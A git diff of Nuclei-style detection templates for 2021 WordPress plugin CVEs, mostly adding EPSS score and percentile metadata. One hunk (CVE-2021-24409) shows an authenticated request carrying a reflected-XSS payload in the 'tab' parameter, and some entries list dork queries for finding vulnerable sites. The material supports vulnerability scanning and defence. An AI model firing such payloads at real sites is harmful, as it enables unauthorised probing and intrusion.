b/http/cves/2021/CVE-2021-24150.yaml index 3b850d418d..5bb278ab05 100644 --- a/http/cves/2021/CVE-2021-24150.yaml +++ b/http/cves/2021/CVE-2021-24150.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-24150 cwe-id: CWE-918 - epss-score: 0.02348 + epss-score: 0.02513 cpe: cpe:2.3:a:likebtn-like-button_project:likebtn-like-button:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.88746 metadata: max-request: 1 verified: true diff --git a/http/cves/2021/CVE-2021-24155.yaml b/http/cves/2021/CVE-2021-24155.yaml index 6561b50bfb..86b3bcf025 100644 --- a/http/cves/2021/CVE-2021-24155.yaml +++ b/http/cves/2021/CVE-2021-24155.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.2 cve-id: CVE-2021-24155 cwe-id: CWE-434 - epss-score: 0.95474 + epss-score: 0.95167 cpe: cpe:2.3:a:backup-guard:backup_guard:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.99034 metadata: max-request: 4 verified: true diff --git a/http/cves/2021/CVE-2021-24165.yaml b/http/cves/2021/CVE-2021-24165.yaml index 240938494d..ad4ae02bb5 100644 --- a/http/cves/2021/CVE-2021-24165.yaml +++ b/http/cves/2021/CVE-2021-24165.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-601 epss-score: 0.00116 cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.44596 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24169.yaml b/http/cves/2021/CVE-2021-24169.yaml index f3252ead0b..196aa642ce 100644 --- a/http/cves/2021/CVE-2021-24169.yaml +++ b/http/cves/2021/CVE-2021-24169.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-79 epss-score: 0.00183 cpe: cpe:2.3:a:algolplus:advanced_order_export:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.54871 metadata: max-request: 2 verified: true diff --git a/http/cves/2021/CVE-2021-24176.yaml b/http/cves/2021/CVE-2021-24176.yaml index 77b4ffb0ea..9598a8510b 100644 --- a/http/cves/2021/CVE-2021-24176.yaml +++ b/http/cves/2021/CVE-2021-24176.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00136 cpe: cpe:2.3:a:jh_404_logger_project:jh_404_logger:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.48282 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24210.yaml b/http/cves/2021/CVE-2021-24210.yaml index 21c3ad4076..fdadb44386 100644 --- a/http/cves/2021/CVE-2021-24210.yaml +++ b/http/cves/2021/CVE-2021-24210.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-601 epss-score: 0.00116 cpe: cpe:2.3:a:kiboit:phastpress:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.44596 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24214.yaml b/http/cves/2021/CVE-2021-24214.yaml index 66635139d6..0b7d049745 100644 --- a/http/cves/2021/CVE-2021-24214.yaml +++ b/http/cves/2021/CVE-2021-24214.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00369 cpe: cpe:2.3:a:daggerhartlab:openid_connect_generic_client:3.8.0:*:*:*:*:wordpress:*:* + epss-percentile: 0.69091 metadata: max-request: 1 verified: true diff --git a/http/cves/2021/CVE-2021-24226.yaml b/http/cves/2021/CVE-2021-24226.yaml index 63b9bfb5e1..90a2856bc8 100644 --- a/http/cves/2021/CVE-2021-24226.yaml +++ b/http/cves/2021/CVE-2021-24226.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-200 epss-score: 0.03501 cpe: cpe:2.3:a:accessally:accessally:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.90323 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24227.yaml b/http/cves/2021/CVE-2021-24227.yaml index 6b82d04b4c..b5141b55f4 100644 --- a/http/cves/2021/CVE-2021-24227.yaml +++ b/http/cves/2021/CVE-2021-24227.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-200 epss-score: 0.03493 cpe: cpe:2.3:a:patreon:patreon_wordpress:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.90307 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24235.yaml b/http/cves/2021/CVE-2021-24235.yaml index 0156a85cd7..a908b8bcb1 100644 --- a/http/cves/2021/CVE-2021-24235.yaml +++ b/http/cves/2021/CVE-2021-24235.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00116 cpe: cpe:2.3:a:boostifythemes:goto:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.44609 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24236.yaml b/http/cves/2021/CVE-2021-24236.yaml index 5f13ecb224..fdd12bda7f 100644 --- a/http/cves/2021/CVE-2021-24236.yaml +++ b/http/cves/2021/CVE-2021-24236.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: "CVE-2021-24236" cwe-id: CWE-434 - epss-score: 0.11054 + epss-score: 0.14539 cpe: cpe:2.3:a:imagements_project:imagements:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.95043 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24237.yaml b/http/cves/2021/CVE-2021-24237.yaml index 1f0c27dac1..7cf3616d70 100644 --- a/http/cves/2021/CVE-2021-24237.yaml +++ b/http/cves/2021/CVE-2021-24237.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00284 cpe: cpe:2.3:a:purethemes:findeo:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.64615 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24239.yaml b/http/cves/2021/CVE-2021-24239.yaml index 671968f9f8..378b29a0f5 100644 --- a/http/cves/2021/CVE-2021-24239.yaml +++ b/http/cves/2021/CVE-2021-24239.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00116 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.44596 metadata: max-request: 1 verified: true diff --git a/http/cves/2021/CVE-2021-24245.yaml b/http/cves/2021/CVE-2021-24245.yaml index b3f4519f3c..c340a16307 100644 --- a/http/cves/2021/CVE-2021-24245.yaml +++ b/http/cves/2021/CVE-2021-24245.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00177 cpe: cpe:2.3:a:trumani:stop_spammers:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.54153 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24274.yaml b/http/cves/2021/CVE-2021-24274.yaml index 681392d2ba..53e3d49b93 100644 --- a/http/cves/2021/CVE-2021-24274.yaml +++ b/http/cves/2021/CVE-2021-24274.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00147 cpe: cpe:2.3:a:supsystic:ultimate_maps:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.50047 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24275.yaml b/http/cves/2021/CVE-2021-24275.yaml index f7810f034d..e046003663 100644 --- a/http/cves/2021/CVE-2021-24275.yaml +++ b/http/cves/2021/CVE-2021-24275.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00177 cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.54153 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24276.yaml b/http/cves/2021/CVE-2021-24276.yaml index 0b04423d3d..6a386ff5f3 100644 --- a/http/cves/2021/CVE-2021-24276.yaml +++ b/http/cves/2021/CVE-2021-24276.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00177 cpe: cpe:2.3:a:supsystic:contact_form:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.54153 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24278.yaml b/http/cves/2021/CVE-2021-24278.yaml index e734626adc..8ffb0fa7bb 100644 --- a/http/cves/2021/CVE-2021-24278.yaml +++ b/http/cves/2021/CVE-2021-24278.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-863 epss-score: 0.07444 cpe: cpe:2.3:a:querysol:redirection_for_contact_form_7:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.9325 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24284.yaml b/http/cves/2021/CVE-2021-24284.yaml index 6c438dd4e4..03db28e502 100644 --- a/http/cves/2021/CVE-2021-24284.yaml +++ b/http/cves/2021/CVE-2021-24284.yaml @@ -18,8 +18,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24284 cwe-id: CWE-434 - epss-score: 0.96916 + epss-score: 0.96885 cpe: cpe:2.3:a:kaswara_project:kaswara:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.99579 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24285.yaml b/http/cves/2021/CVE-2021-24285.yaml index ee32319289..f6261cda0f 100644 --- a/http/cves/2021/CVE-2021-24285.yaml +++ b/http/cves/2021/CVE-2021-24285.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24285 cwe-id: CWE-89 - epss-score: 0.10831 + epss-score: 0.12049 cpe: cpe:2.3:a:cars-seller-auto-classifieds-script_project:cars-seller-auto-classifieds-script:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.94624 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24287.yaml b/http/cves/2021/CVE-2021-24287.yaml index 5127a93553..0cffaa9100 100644 --- a/http/cves/2021/CVE-2021-24287.yaml +++ b/http/cves/2021/CVE-2021-24287.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-79 epss-score: 0.00177 cpe: cpe:2.3:a:mooveagency:select_all_categories_and_taxonomies\,_change_checkbox_to_radio_buttons:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.54153 metadata: max-request: 2 verified: true diff --git a/http/cves/2021/CVE-2021-24288.yaml b/http/cves/2021/CVE-2021-24288.yaml index ef03cf8833..48a45fbbf5 100644 --- a/http/cves/2021/CVE-2021-24288.yaml +++ b/http/cves/2021/CVE-2021-24288.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-601 epss-score: 0.0015 cpe: cpe:2.3:a:acymailing:acymailing:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.50525 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24291.yaml b/http/cves/2021/CVE-2021-24291.yaml index 3c816aeb9c..209ac4959b 100644 --- a/http/cves/2021/CVE-2021-24291.yaml +++ b/http/cves/2021/CVE-2021-24291.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00085 cpe: cpe:2.3:a:10web:photo_gallery:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.35153 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24298.yaml b/http/cves/2021/CVE-2021-24298.yaml index 92192e4638..2707d7a3cc 100644 --- a/http/cves/2021/CVE-2021-24298.yaml +++ b/http/cves/2021/CVE-2021-24298.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00116 cpe: cpe:2.3:a:ibenic:simple_giveaways:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.44609 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24300.yaml b/http/cves/2021/CVE-2021-24300.yaml index 01bfff5d9d..39e61c7a4b 100644 --- a/http/cves/2021/CVE-2021-24300.yaml +++ b/http/cves/2021/CVE-2021-24300.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.00302 cpe: cpe:2.3:a:pickplugins:product_slider_for_woocommerce:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.65712 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24316.yaml b/http/cves/2021/CVE-2021-24316.yaml index 74335ca9c2..6fb3bc421f 100644 --- a/http/cves/2021/CVE-2021-24316.yaml +++ b/http/cves/2021/CVE-2021-24316.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00246 cpe: cpe:2.3:a:wowthemes:mediumish:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.61827 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24320.yaml b/http/cves/2021/CVE-2021-24320.yaml index 9d3770b9bf..1277647f35 100644 --- a/http/cves/2021/CVE-2021-24320.yaml +++ b/http/cves/2021/CVE-2021-24320.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00116 cpe: cpe:2.3:a:bold-themes:bello:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.44609 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24335.yaml b/http/cves/2021/CVE-2021-24335.yaml index 5c013a115b..5e3b56b329 100644 --- a/http/cves/2021/CVE-2021-24335.yaml +++ b/http/cves/2021/CVE-2021-24335.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00163 cpe: cpe:2.3:a:smartdatasoft:car_repair_services_\&_auto_mechanic:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.52284 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24340.yaml b/http/cves/2021/CVE-2021-24340.yaml index edeaf856e5..1ecd583719 100644 --- a/http/cves/2021/CVE-2021-24340.yaml +++ b/http/cves/2021/CVE-2021-24340.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-24340 cwe-id: CWE-89 - epss-score: 0.03382 + epss-score: 0.02665 cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.89061 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24342.yaml b/http/cves/2021/CVE-2021-24342.yaml index c2a4784b42..047b5b0cb0 100644 --- a/http/cves/2021/CVE-2021-24342.yaml +++ b/http/cves/2021/CVE-2021-24342.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.00102 cpe: cpe:2.3:a:jnews:jnews:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.40864 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24347.yaml b/http/cves/2021/CVE-2021-24347.yaml index 78721b329f..c8065cd207 100644 --- a/http/cves/2021/CVE-2021-24347.yaml +++ b/http/cves/2021/CVE-2021-24347.yaml @@ -17,8 +17,9 @@ info: cvss-score: 8.8 cve-id: CVE-2021-24347 cwe-id: CWE-178 - epss-score: 0.96989 + epss-score: 0.96951 cpe: cpe:2.3:a:smartypantsplugins:sp_project_\&_document_manager:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.99611 metadata: max-request: 4 verified: true diff --git a/http/cves/2021/CVE-2021-24351.yaml b/http/cves/2021/CVE-2021-24351.yaml index 57c7ed04d3..734a15b537 100644 --- a/http/cves/2021/CVE-2021-24351.yaml +++ b/http/cves/2021/CVE-2021-24351.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00145 cpe: cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.49646 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24358.yaml b/http/cves/2021/CVE-2021-24358.yaml index 4bdd94c74d..1eade80563 100644 --- a/http/cves/2021/CVE-2021-24358.yaml +++ b/http/cves/2021/CVE-2021-24358.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-601 epss-score: 0.00255 cpe: cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.62645 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24364.yaml b/http/cves/2021/CVE-2021-24364.yaml index c427d4d6ef..11a228353d 100644 --- a/http/cves/2021/CVE-2021-24364.yaml +++ b/http/cves/2021/CVE-2021-24364.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.00102 cpe: cpe:2.3:a:tielabs:jannah:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.40864 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24370.yaml b/http/cves/2021/CVE-2021-24370.yaml index cd908c3893..242d65bb12 100644 --- a/http/cves/2021/CVE-2021-24370.yaml +++ b/http/cves/2021/CVE-2021-24370.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24370 cwe-id: CWE-434 - epss-score: 0.05489 + epss-score: 0.06587 cpe: cpe:2.3:a:radykal:fancy_product_designer:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.9286 metadata: max-request: 1 google-query: inurl:“/wp-content/plugins/fancy-product-designer” diff --git a/http/cves/2021/CVE-2021-24387.yaml b/http/cves/2021/CVE-2021-24387.yaml index 0cbcac2eb9..cf8998aec1 100644 --- a/http/cves/2021/CVE-2021-24387.yaml +++ b/http/cves/2021/CVE-2021-24387.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00145 cpe: cpe:2.3:a:contempothemes:real_estate_7:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.49646 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24389.yaml b/http/cves/2021/CVE-2021-24389.yaml index 46bd363432..d722d81d6b 100644 --- a/http/cves/2021/CVE-2021-24389.yaml +++ b/http/cves/2021/CVE-2021-24389.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.00158 cpe: cpe:2.3:a:chimpgroup:foodbakery:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.51613 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24406.yaml b/http/cves/2021/CVE-2021-24406.yaml index 54c1b97cea..dc6706b329 100644 --- a/http/cves/2021/CVE-2021-24406.yaml +++ b/http/cves/2021/CVE-2021-24406.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-601 epss-score: 0.0015 cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.50525 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24407.yaml b/http/cves/2021/CVE-2021-24407.yaml index c9676b23a5..bd35b16d9d 100644 --- a/http/cves/2021/CVE-2021-24407.yaml +++ b/http/cves/2021/CVE-2021-24407.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.00161 cpe: cpe:2.3:a:tielabs:jannah:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.52061 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24409.yaml b/http/cves/2021/CVE-2021-24409.yaml index bdddbacec9..73412dcdc1 100644 --- a/http/cves/2021/CVE-2021-24409.yaml +++ b/http/cves/2021/CVE-2021-24409.yaml @@ -6,20 +6,26 @@ info: severity: medium description: | The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator - remediation: Fixed in version 2.8 reference: - https://wpscan.com/vulnerability/ae3cd3ed-aecd-4d8c-8a2b-2936aaaef0cf - https://nvd.nist.gov/vuln/detail/CVE-2021-24409 + remediation: Fixed in version 2.8 classification: - cve-id: CVE-2021-24409 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 + cve-id: CVE-2021-24409 cwe-id: CWE-79 + epss-score: 0.00188 + cpe: cpe:2.3:a:plugin-planet:prismatic:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.55477 metadata: max-request: 2 verified: true publicwww-query: "/wp-content/plugins/prismatic" - tags: cve,cve2023,wordpress,wp,wp-plugin,xss,prismatic,authenticated + framework: wordpress + vendor: plugin-planet + product: prismatic + tags: wpscan,cve,cve2023,wordpress,wp,wp-plugin,xss,prismatic,authenticated http: - raw: @@ -29,7 +35,6 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/options-general.php?page=prismatic&tab=%22+style%3Danimation-name%3Arotation+onanimationend%3Dalert(document.domain)%2F%2F%22 HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2021/CVE-2021-24435.yaml b/http/cves/2021/CVE-2021-24435.yaml index 6e02afa6f7..6e171ea922 100644 --- a/http/cves/2021/CVE-2021-24435.yaml +++ b/http/cves/2021/CVE-2021-24435.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-79 epss-score: 0.0014 cpe: cpe:2.3:a:gambit:titan_framework:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.48875 metadata: max-request: 3 verified: true diff --git a/http/cves/2021/CVE-2021-24436.yaml b/http/cves/2021/CVE-2021-24436.yaml index 46dae21b30..0cda7ed618 100644 --- a/http/cves/2021/CVE-2021-24436.yaml +++ b/http/cves/2021/CVE-2021-24436.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-79 epss-score: 0.001 cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.40466 metadata: max-request: 2 verified: true diff --git a/http/cves/2021/CVE-2021-24452.yaml b/http/cves/2021/CVE-2021-24452.yaml index c38da3d0ce..465c233b87 100644 --- a/http/cves/2021/CVE-2021-24452.yaml +++ b/http/cves/2021/CVE-2021-24452.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.001 cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.40466 metadata: max-request: 2 verified: true diff --git a/http/cves/2021/CVE-2021-24472.yaml b/http/cves/2021/CVE-2021-24472.yaml index dfb849d2f5..6a7cedad7a 100644 --- a/http/cves/2021/CVE-2021-24472.yaml +++ b/http/cves/2021/CVE-2021-24472.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24472 cwe-id: CWE-918 - epss-score: 0.01878 + epss-score: 0.02619 cpe: cpe:2.3:a:qantumthemes:kentharadio:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.88968 metadata: max-request: 1 verified: true diff --git a/http/cves/2021/CVE-2021-24488.yaml b/http/cves/2021/CVE-2021-24488.yaml index 67035d4739..843c534778 100644 --- a/http/cves/2021/CVE-2021-24488.yaml +++ b/http/cves/2021/CVE-2021-24488.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.00302 cpe: cpe:2.3:a:pickplugins:post_grid:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.65712 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24495.yaml b/http/cves/2021/CVE-2021-24495.yaml index 32be649c09..f6165228c8 100644 --- a/http/cves/2021/CVE-2021-24495.yaml +++ b/http/cves/2021/CVE-2021-24495.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00116 cpe: cpe:2.3:a:marmoset:marmoset_viewer:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.44609 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24498.yaml b/http/cves/2021/CVE-2021-24498.yaml index 34edbb7781..edd39ff610 100644 --- a/http/cves/2021/CVE-2021-24498.yaml +++ b/http/cves/2021/CVE-2021-24498.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.00188 cpe: cpe:2.3:a:dwbooster:calendar_event_multi_view:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.55477 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24499.yaml b/http/cves/2021/CVE-2021-24499.yaml index a231e890df..258b781798 100644 --- a/http/cves/2021/CVE-2021-24499.yaml +++ b/http/cves/2021/CVE-2021-24499.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-434 epss-score: 0.19069 cpe: cpe:2.3:a:amentotech:workreap:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.95597 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24510.yaml b/http/cves/2021/CVE-2021-24510.yaml index 5f1366f287..31c3508b41 100644 --- a/http/cves/2021/CVE-2021-24510.yaml +++ b/http/cves/2021/CVE-2021-24510.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.00143 cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:*:*:*:*:wordpress:*:*:* + epss-percentile: 0.49453 metadata: max-request: 2 vendor: mf_gig_calendar_project diff --git a/http/cves/2021/CVE-2021-24554.yaml b/http/cves/2021/CVE-2021-24554.yaml index dd89972d67..1d58776b4f 100644 --- a/http/cves/2021/CVE-2021-24554.yaml +++ b/http/cves/2021/CVE-2021-24554.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.2 cve-id: CVE-2021-24554 cwe-id: CWE-89 - epss-score: 0.13355 + epss-score: 0.13127 cpe: cpe:2.3:a:freelancetoindia:paytm-pay:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.94817 metadata: max-request: 2 verified: true diff --git a/http/cves/2021/CVE-2021-24647.yaml b/http/cves/2021/CVE-2021-24647.yaml index 3c3a340369..eecd8276b1 100644 --- a/http/cves/2021/CVE-2021-24647.yaml +++ b/http/cves/2021/CVE-2021-24647.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-287 epss-score: 0.2135 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.9579 metadata: max-request: 3 verified: "true" diff --git a/http/cves/2021/CVE-2021-24666.yaml b/http/cves/2021/CVE-2021-24666.yaml index de022f141e..34c6f6bc07 100644 --- a/http/cves/2021/CVE-2021-24666.yaml +++ b/http/cves/2021/CVE-2021-24666.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-89 epss-score: 0.20933 cpe: cpe:2.3:a:podlove:podlove_podcast_publisher:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.95759 metadata: max-request: 1 verified: true diff --git a/http/cves/2021/CVE-2021-24731.yaml b/http/cves/2021/CVE-2021-24731.yaml index 72006344d1..52c2c08e34 100644 --- a/http/cves/2021/CVE-2021-24731.yaml +++ b/http/cves/2021/CVE-2021-24731.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24731 cwe-id: CWE-89 - epss-score: 0.134 + epss-score: 0.17893 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.95474 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2021/CVE-2021-24746.yaml b/http/cves/2021/CVE-2021-24746.yaml index 508e8f6be2..124d030b55 100644 --- a/http/cves/2021/CVE-2021-24746.yaml +++ b/http/cves/2021/CVE-2021-24746.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.00119 cpe: cpe:2.3:a:heateor:sassy_social_share:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.45304 metadata: max-request: 2 google-query: inurl:"/wp-content/plugins/sassy-social-share" diff --git a/http/cves/2021/CVE-2021-24750.yaml b/http/cves/2021/CVE-2021-24750.yaml index 169f1aaf9f..6b03e8d439 100644 --- a/http/cves/2021/CVE-2021-24750.yaml +++ b/http/cves/2021/CVE-2021-24750.yaml @@ -15,8 +15,9 @@ info: cvss-score: 8.8 cve-id: CVE-2021-24750 cwe-id: CWE-89 - epss-score: 0.00776 + epss-score: 0.00791 cpe: cpe:2.3:a:wp_visitor_statistics_\(real_time_traffic\)_project:wp_visitor_statistics_\(real_time_traffic\):*:*:*:*:*:wordpress:*:* + epss-percentile: 0.79355 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24762.yaml b/http/cves/2021/CVE-2021-24762.yaml index 1c0ae948b7..d7d14c2f64 100644 --- a/http/cves/2021/CVE-2021-24762.yaml +++ b/http/cves/2021/CVE-2021-24762.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24762 cwe-id: CWE-89 - epss-score: 0.00893 + epss-score: 0.00848 cpe: cpe:2.3:a:getperfectsurvey:perfect_survey:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.80045 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-24827.yaml b/http/cves/2021/CVE-2021-24827.yaml index 3cfea99f76..823cbecb60 100644 --- a/http/cves/2021/CVE-2021-24827.yaml +++ b/http/cves/2021/CVE-2021-24827.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24827 cwe-id: CWE-89 - epss-score: 0.09926 + epss-score: 0.17594 cpe: cpe:2.3:a:asgaros:asgaros_forum:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.95442 metadata: max-request: 1 verified: true diff --git a/http/cves/2021/CVE-2021-24838.yaml b/http/cves/2021/CVE-2021-24838.yaml index 5f59e0f82c..8c81550e41 100644 --- a/http/cves/2021/CVE-2021-24838.yaml +++ b/http/cves/2021/CVE-2021-24838.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24838 